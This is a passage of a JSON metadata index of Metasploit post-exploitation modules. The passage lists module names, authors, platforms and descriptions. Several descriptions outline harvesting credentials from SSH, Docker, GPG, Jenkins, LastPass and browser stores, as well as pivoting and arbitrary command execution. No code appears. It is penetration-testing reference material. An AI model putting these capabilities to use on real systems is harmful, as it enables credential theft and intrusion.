"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/aws_keys.rb",
"is_install_path": true,
"ref_name": "multi/gather/aws_keys",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/check_malware": {
"name": "Multi Gather Malware Verifier",
"full_name": "post/multi/gather/check_malware",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will check a file for malware on VirusTotal based on the checksum.",
"references": [
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/check_malware.rb",
"is_install_path": true,
"ref_name": "multi/gather/check_malware",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/chrome_cookies": {
"name": "Chrome Gather Cookies",
"full_name": "post/multi/gather/chrome_cookies",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mangopdf <mangodotpdf@gmail.com>"
],
"description": "Read all cookies from the Default Chrome profile of the target user.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-15 07:19:46 +0000",
"path": "/modules/post/multi/gather/chrome_cookies.rb",
"is_install_path": true,
"ref_name": "multi/gather/chrome_cookies",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/dbvis_enum": {
"name": "Multi Gather DbVisualizer Connections Settings",
"full_name": "post/multi/gather/dbvis_enum",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"David Bloom"
],
"description": "DbVisualizer stores the user database configuration in dbvis.xml.\n This module retrieves the connections settings from this file and decrypts the encrypted passwords.",
"references": [
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/dbvis_enum.rb",
"is_install_path": true,
"ref_name": "multi/gather/dbvis_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/dns_bruteforce": {
"name": "Multi Gather DNS Forward Lookup Bruteforce",
"full_name": "post/multi/gather/dns_bruteforce",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Brute force subdomains and hostnames via wordlist.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/dns_bruteforce.rb",
"is_install_path": true,
"ref_name": "multi/gather/dns_bruteforce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/dns_reverse_lookup": {
"name": "Multi Gather DNS Reverse Lookup Scan",
"full_name": "post/multi/gather/dns_reverse_lookup",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Performs DNS reverse lookup using the OS included DNS query command.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/dns_reverse_lookup.rb",
"is_install_path": true,
"ref_name": "multi/gather/dns_reverse_lookup",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/dns_srv_lookup": {
"name": "Multi Gather DNS Service Record Lookup Scan",
"full_name": "post/multi/gather/dns_srv_lookup",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Enumerates known SRV Records for a given domain using target host DNS query tool.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 19:38:43 +0000",
"path": "/modules/post/multi/gather/dns_srv_lookup.rb",
"is_install_path": true,
"ref_name": "multi/gather/dns_srv_lookup",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/docker_creds": {
"name": "Multi Gather Docker Credentials Collection",
"full_name": "post/multi/gather/docker_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Flibustier"
],
"description": "This module will collect the contents of all users' .docker directories on the targeted\n machine. If the user has already pushed to Docker Hub, chances are that the password was\n saved in base64 (default behavior).",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-25 18:15:24 +0000",
"path": "/modules/post/multi/gather/docker_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/docker_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/enum_vbox": {
"name": "Multi Gather VirtualBox VM Enumeration",
"full_name": "post/multi/gather/enum_vbox",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to enumerate any VirtualBox VMs on the target machine.\n Due to the nature of VirtualBox, this module can only enumerate VMs registered\n for the current user, therefore, this module needs to be invoked from a user context.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-30 15:45:52 +0000",
"path": "/modules/post/multi/gather/enum_vbox.rb",
"is_install_path": true,
"ref_name": "multi/gather/enum_vbox",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/env": {
"name": "Multi Gather Generic Operating System Environment Settings",
"full_name": "post/multi/gather/env",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"egypt <egypt@metasploit.com>"
],
"description": "This module prints out the operating system environment variables",
"references": [
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/env.rb",
"is_install_path": true,
"ref_name": "multi/gather/env",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/fetchmailrc_creds": {
"name": "UNIX Gather .fetchmailrc Credentials",
"full_name": "post/multi/gather/fetchmailrc_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Post Module to obtain credentials saved for IMAP, POP and other mail\n retrieval protocols in fetchmail's .fetchmailrc",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/fetchmailrc_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/fetchmailrc_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/filezilla_client_cred": {
"name": "Multi Gather FileZilla FTP Client Credential Collection",
"full_name": "post/multi/gather/filezilla_client_cred",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bannedit <bannedit@metasploit.com>",
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will collect credentials from the FileZilla FTP client if it is installed.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/filezilla_client_cred.rb",
"is_install_path": true,
"ref_name": "multi/gather/filezilla_client_cred",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/find_vmx": {
"name": "Multi Gather VMWare VM Identification",
"full_name": "post/multi/gather/find_vmx",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to find any VMWare virtual machines stored on the target.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/find_vmx.rb",
"is_install_path": true,
"ref_name": "multi/gather/find_vmx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/firefox_creds": {
"name": "Multi Gather Firefox Signon Credential Collection",
"full_name": "post/multi/gather/firefox_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bannedit <bannedit@metasploit.com>",
"xard4s",
"g0tmi1k"
],
"description": "This module will collect credentials from the Firefox web browser if it is\n installed on the targeted machine. Additionally, cookies are downloaded, which\n could potentially yield valid web sessions.\n\n Firefox stores passwords within the signons.sqlite database file. There is also a\n keys3.db file which contains the key for decrypting these passwords. In cases where\n a Master Password has not been set, the passwords can easily be decrypted using\n 3rd party tools or by setting the DECRYPT option to true. Using the latter often\n needs root privileges. Also be warned that if your session dies in the middle of the\n file renaming process, this could leave Firefox in a non-working state. If a\n Master Password was used, the only option would be to brute-force it.\n\n Useful 3rd party tools:\n + firefox_decrypt (https://github.com/Unode/firefox_decrypt)\n + pswRecovery4Moz (https://github.com/philsmd/pswRecovery4Moz)",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/firefox_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/firefox_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/gpg_creds": {
"name": "Multi Gather GnuPG Credentials Collection",
"full_name": "post/multi/gather/gpg_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Dhiru Kholia <dhiru@openwall.com>"
],
"description": "This module will collect the contents of all users' .gnupg directories on the targeted\n machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-28 10:16:59 +0000",
"path": "/modules/post/multi/gather/gpg_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/gpg_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/irssi_creds": {
"name": "Multi Gather IRSSI IRC Password(s)",
"full_name": "post/multi/gather/irssi_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jonathan Claudius <jclaudius@mozilla.com>"
],
"description": "This module grabs IRSSI IRC credentials.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/irssi_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/irssi_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/jboss_gather": {
"name": "Jboss Credential Collector",
"full_name": "post/multi/gather/jboss_gather",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Koen Riepe (koen.riepe <Koen Riepe (koen.riepe@fox-it.com)>"
],
"description": "This module can be used to extract the Jboss admin passwords for versions 4, 5 and 6.",
"references": [
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/jboss_gather.rb",
"is_install_path": true,
"ref_name": "multi/gather/jboss_gather",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/jenkins_gather": {
"name": "Jenkins Credential Collector",
"full_name": "post/multi/gather/jenkins_gather",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"thesubtlety"
],
"description": "This module can be used to extract saved Jenkins credentials, user\n tokens, SSH keys, and secrets. Interesting files will be stored in\n loot along with combined csv output.",
"references": [
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-10 15:25:09 +0000",
"path": "/modules/post/multi/gather/jenkins_gather.rb",
"is_install_path": true,
"ref_name": "multi/gather/jenkins_gather",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/lastpass_creds": {
"name": "LastPass Vault Decryptor",
"full_name": "post/multi/gather/lastpass_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Alberto Garcia Illera <agarciaillera@gmail.com>",
"Martin Vigo <martinvigo@gmail.com>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module extracts and decrypts LastPass master login accounts and passwords,\n encryption keys, 2FA tokens and all the vault passwords",
"references": [
"URL-http://www.martinvigo.com/even-the-lastpass-will-be-stolen-deal-with-it"
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-30 15:45:52 +0000",
"path": "/modules/post/multi/gather/lastpass_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/lastpass_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/maven_creds": {
"name": "Multi Gather Maven Credentials Collection",
"full_name": "post/multi/gather/maven_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"elenoir"
],
"description": "This module will collect the contents of all users' settings.xml on the targeted\n machine.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-26 17:52:11 +0000",
"path": "/modules/post/multi/gather/maven_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/maven_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/multi_command": {
"name": "Multi Gather Run Shell Command Resource File",
"full_name": "post/multi/gather/multi_command",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will read shell commands from a resource file and\n execute the commands in the specified Meterpreter or shell session.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/multi_command.rb",
"is_install_path": true,
"ref_name": "multi/gather/multi_command",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/netrc_creds": {
"name": "UNIX Gather .netrc Credentials",
"full_name": "post/multi/gather/netrc_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Post Module to obtain credentials saved for FTP and other services in .netrc",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/netrc_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/netrc_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/pgpass_creds": {
"name": "Multi Gather pgpass Credentials",
"full_name": "post/multi/gather/pgpass_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Zach Grace <zgrace@403labs.com>"
],
"description": "This module will collect the contents of all users' .pgpass or pgpass.conf\n file and parse them for credentials.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/pgpass_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/pgpass_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/pidgin_cred": {
"name": "Multi Gather Pidgin Instant Messenger Credential Collection",
"full_name": "post/multi/gather/pidgin_cred",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bannedit <bannedit@metasploit.com>",
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will collect credentials from the Pidgin IM client if it is installed.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/pidgin_cred.rb",
"is_install_path": true,
"ref_name": "multi/gather/pidgin_cred",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/ping_sweep": {
"name": "Multi Gather Ping Sweep",
"full_name": "post/multi/gather/ping_sweep",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Performs IPv4 ping sweep using the OS included ping command.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/ping_sweep.rb",
"is_install_path": true,
"ref_name": "multi/gather/ping_sweep",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/remmina_creds": {
"name": "UNIX Gather Remmina Credentials",
"full_name": "post/multi/gather/remmina_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files.\n These are encrypted with 3DES using a 256-bit key generated by Remmina which is (by design)\n stored in (relatively) plain text in a file that must be properly protected.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-30 15:45:52 +0000",
"path": "/modules/post/multi/gather/remmina_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/remmina_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/resolve_hosts": {
"name": "Multi Gather Resolve Hosts",
"full_name": "post/multi/gather/resolve_hosts",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "Resolves hostnames to either IPv4 or IPv6 addresses from the perspective of the remote host.",
"references": [
],
"platform": "Python,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/resolve_hosts.rb",
"is_install_path": true,
"ref_name": "multi/gather/resolve_hosts",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/rsyncd_creds": {
"name": "UNIX Gather RSYNC Credentials",
"full_name": "post/multi/gather/rsyncd_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Post Module to obtain credentials saved for RSYNC in various locations",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/rsyncd_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/rsyncd_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/rubygems_api_key": {
"name": "Multi Gather RubyGems API Key",
"full_name": "post/multi/gather/rubygems_api_key",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jonathan Claudius <jclaudius@trustwave.com>",
"Brandon Myers <bmyers@trustwave.com>"
],
"description": "This module obtains a user's RubyGems API key from ~/.gem/credentials.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/rubygems_api_key.rb",
"is_install_path": true,
"ref_name": "multi/gather/rubygems_api_key",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/run_console_rc_file": {
"name": "Multi Gather Run Console Resource File",
"full_name": "post/multi/gather/run_console_rc_file",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will read console commands from a resource file and\n execute the commands in the specified Meterpreter session.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/run_console_rc_file.rb",
"is_install_path": true,
"ref_name": "multi/gather/run_console_rc_file",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/skype_enum": {
"name": "Multi Gather Skype User Data Enumeration",
"full_name": "post/multi/gather/skype_enum",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will enumerate Skype account settings, contact list, call history, chat logs,\n file transfer history, and voicemail logs, saving all the data to CSV files for analysis.",
"references": [
],
"platform": "OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/skype_enum.rb",
"is_install_path": true,
"ref_name": "multi/gather/skype_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/ssh_creds": {
"name": "Multi Gather OpenSSH PKI Credentials Collection",
"full_name": "post/multi/gather/ssh_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jim Halfpenny"
],
"description": "This module will collect the contents of all users' .ssh directories on the targeted\n machine. Additionally, known_hosts, authorized_keys and any other files are also\n downloaded. This module is largely based on firefox_creds.rb.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/ssh_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/ssh_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/thunderbird_creds": {
"name": "Multi Gather Mozilla Thunderbird Signon Credential Collection",
"full_name": "post/multi/gather/thunderbird_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect credentials from Mozilla Thunderbird by downloading\n the necessary files such as 'signons.sqlite', 'key3.db', and 'cert8.db' for\n offline decryption with third party tools.\n\n If necessary, you may also set the PARSE option to true to parse the sqlite\n file, which contains sensitive information such as the encrypted username/password.\n However, this feature is not enabled by default, because it requires SQLITE3 gem\n to be installed on your machine.",
"references": [
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/multi/gather/thunderbird_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/thunderbird_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/tomcat_gather": {
"name": "Gather Tomcat Credentials",
"full_name": "post/multi/gather/tomcat_gather",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Koen Riepe <koen.riepe@fox-it.com>"
],
"description": "This module will attempt to collect credentials from Tomcat services running on the machine.",
"references": [
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/tomcat_gather.rb",
"is_install_path": true,
"ref_name": "multi/gather/tomcat_gather",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/wlan_geolocate": {
"name": "Multiplatform WLAN Enumeration and Geolocation",
"full_name": "post/multi/gather/wlan_geolocate",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Tom Sellers <tom@fadedcode.net>"
],
"description": "Enumerate wireless networks visible to the target device.\n Optionally geolocate the target by gathering local wireless networks and\n performing a lookup against Google APIs.",
"references": [
],
"platform": "Android,BSD,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-02 11:38:20 +0000",
"path": "/modules/post/multi/gather/wlan_geolocate.rb",
"is_install_path": true,
"ref_name": "multi/gather/wlan_geolocate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/general/close": {
"name": "Multi Generic Operating System Session Close",
"full_name": "post/multi/general/close",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module closes the specified session. This can be useful as a finisher for automation tasks",
"references": [
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/general/close.rb",
"is_install_path": true,
"ref_name": "multi/general/close",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/general/execute": {
"name": "Multi Generic Operating System Session Command Execution",
"full_name": "post/multi/general/execute",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module executes an arbitrary command line",
"references": [
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/general/execute.rb",
"is_install_path": true,
"ref_name": "multi/general/execute",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/general/wall": {
"name": "Write Messages to Users",
"full_name": "post/multi/general/wall",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module utilizes the wall(1) or write(1) utilities, as appropriate,\n to send messages to users on the target system.",
"references": [
],
"platform": "Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/general/wall.rb",
"is_install_path": true,
"ref_name": "multi/general/wall",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/autoroute": {
"name": "Multi Manage Network Route via Meterpreter Session",
"full_name": "post/multi/manage/autoroute",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"todb <todb@metasploit.com>",
"Josh Hale \"sn0wfa11\" <jhale85446@gmail.com>"
],
"description": "This module manages session routing via an existing\n Meterpreter session. It enables other modules to 'pivot' through a\n compromised host when connecting to the named NETWORK and SUBMASK.\n Autoadd will search a session for valid subnets from the routing table\n and interface list then add routes to them. Default will add a default\n route so that all TCP/IP traffic not specified in the MSF routing table\n will be routed through the session when pivoting. For more details, run\n 'info -d' and click 'Knowledge Base'.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/autoroute.rb",
"is_install_path": true,
"ref_name": "multi/manage/autoroute",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/dbvis_add_db_admin": {
"name": "Multi Manage DbVisualizer Add Db Admin",
"full_name": "post/multi/manage/dbvis_add_db_admin",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"David Bloom"
],
"description": "DbVisualizer offers a command line functionality to execute SQL against pre-configured databases\n (with GUI). The remote database can be accessed from the command line without the need\n to authenticate, which can be abused to create an administrator in the database with the\n proper database permissions. Note: This module currently only supports MySQL.",
"references": [
"URL-http://youtu.be/0LCLRVHX1vA"
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/dbvis_add_db_admin.rb",
"is_install_path": true,
"ref_name": "multi/manage/dbvis_add_db_admin",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"post_multi/manage/dbvis_query": {
"name": "Multi Manage DbVisualizer Query",
"full_name": "post/multi/manage/dbvis_query",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"David Bloom"
],
"description": "DbVisualizer offers a command line functionality to execute SQL against pre-configured databases\n (with GUI). The remote database can be accessed from the command line without the need\n to authenticate, and this module abuses this functionality to run queries and store the\n results.\n\n Please note: escape quotes with a backslash, and your (stacked or not) queries should\n end with a semicolon.",
"references": [
"URL-http://youtu.be/0LCLRVHX1vA"
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/dbvis_query.rb",
